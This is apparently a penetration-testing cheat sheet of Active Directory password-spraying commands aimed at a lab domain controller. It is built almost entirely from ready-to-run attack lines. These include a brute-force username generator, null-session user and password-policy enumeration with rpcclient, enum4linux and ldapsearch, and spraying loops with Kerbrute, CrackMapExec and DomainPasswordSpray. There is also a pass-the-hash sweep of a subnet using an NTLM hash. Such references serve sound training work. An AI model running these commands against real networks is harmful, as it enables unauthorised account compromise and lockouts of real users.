Password Spraying & Password Policies
Username Generation
Username Generation Script
Command:
#!/bin/bash for x in {{A..Z},{0..9}}{{A..Z},{0..9}}{{A..Z},{0..9}}{{A..Z},{0..9}} do echo $x doneResult: Generates 16,079,616 possible username combinations from a Linux-based host.
Password Policy Enumeration
CrackMapExec - Password Policy
Command:
crackmapexec smb 172.16.5.5 -u avazquez -p Password123 --passpolResult: Enumerates the password policy using CrackMapExec.
rpcclient - Null Session Enumeration
Command:
rpcclient -U "" -N 172.16.5.5Result: Discovers domain information through SMB NULL sessions.
rpcclient - Query Domain Information
Command:
rpcclient $> querydominfoResult: Retrieves domain password policy details.
enum4linux - Password Policy
Command:
enum4linux -P 172.16.5.5Result: Enumerates the password policy using enum4linux.
enum4linux-ng - Password Policy & Output Save
Command:
enum4linux-ng -P 172.16.5.5 -oA ilfreightResult: Enumerates password policy and saves output in YAML & JSON formats.
ldapsearch - Password Policy Enumeration
Command:
ldapsearch -h 172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLengthResult: Retrieves password policy settings from a Windows domain.
net accounts - Windows Domain Password Policy
Command:
net accountsResult: Enumerates the password policy on a Windows domain.
PowerView - Import Module
Command:
Import-Module .\PowerView.ps1Result: Loads the PowerView module for Active Directory enumeration.
PowerView - Get Domain Policy
Command:
Get-DomainPolicyResult: Retrieves domain password policy settings.
User Enumeration
enum4linux - User Enumeration
Command:
enum4linux -U 172.16.5.5 | grep "user:" | cut -f2 -d"[" | cut -f1 -d"]"Result: Lists users in a Windows domain.
rpcclient - Enumerate Domain Users
Command:
rpcclient -U "" -N 172.16.5.5 rpcclient $> enumdomuserResult: Enumerates domain users via rpcclient.
CrackMapExec - User Enumeration
Command:
crackmapexec smb 172.16.5.5 --usersResult: Lists users in the Windows domain.
ldapsearch - User Enumeration
Command:
ldapsearch -h 172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "(&(objectclass=user))" | grep sAMAccountName: | cut -f2 -d" "Result: Retrieves usernames from Active Directory.
windapsearch - User Enumeration
Command:
./windapsearch.py --dc-ip 172.16.5.5 -u "" -UResult: Lists users in the target Windows domain.
Password Spraying Attacks
rpcclient - Password Spraying
Command:
for u in $(cat valid_users.txt); do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 | grep Authority; doneResult: Performs a password spraying attack using rpcclient.
Kerbrute - Password Spraying
Command:
kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 valid_users.txt Welcome1Result: Conducts a Kerberos-based password spraying attack.
CrackMapExec - Password Spraying
Command:
sudo crackmapexec smb 172.16.5.5 -u valid_users.txt -p Password123 | grep +Result: Performs a password spraying attack and filters successful attempts.
CrackMapExec - Credential Validation
Command:
sudo crackmapexec smb 172.16.5.5 -u avazquez -p Password123Result: Checks if provided credentials are valid.
CrackMapExec - Local Authentication Password Check
Command:
sudo crackmapexec smb --localauth 172.16.5.0/24 -u administrator -H 88ad09182de639ccc6579eb0849751cf | grep +Result: Uses local authentication to validate passwords while avoiding account lockouts.
PowerShell - Import DomainPasswordSpray
Command:
Import-Module .\DomainPasswordSpray.ps1Result: Loads the DomainPasswordSpray PowerShell tool.
PowerShell - Execute Password Spraying
Command:
Invoke-DomainPasswordSpray -Password Welcome1 -OutFile spray_success -ErrorAction SilentlyContinueResult: Runs a password spraying attack and saves results to a file.
Last updated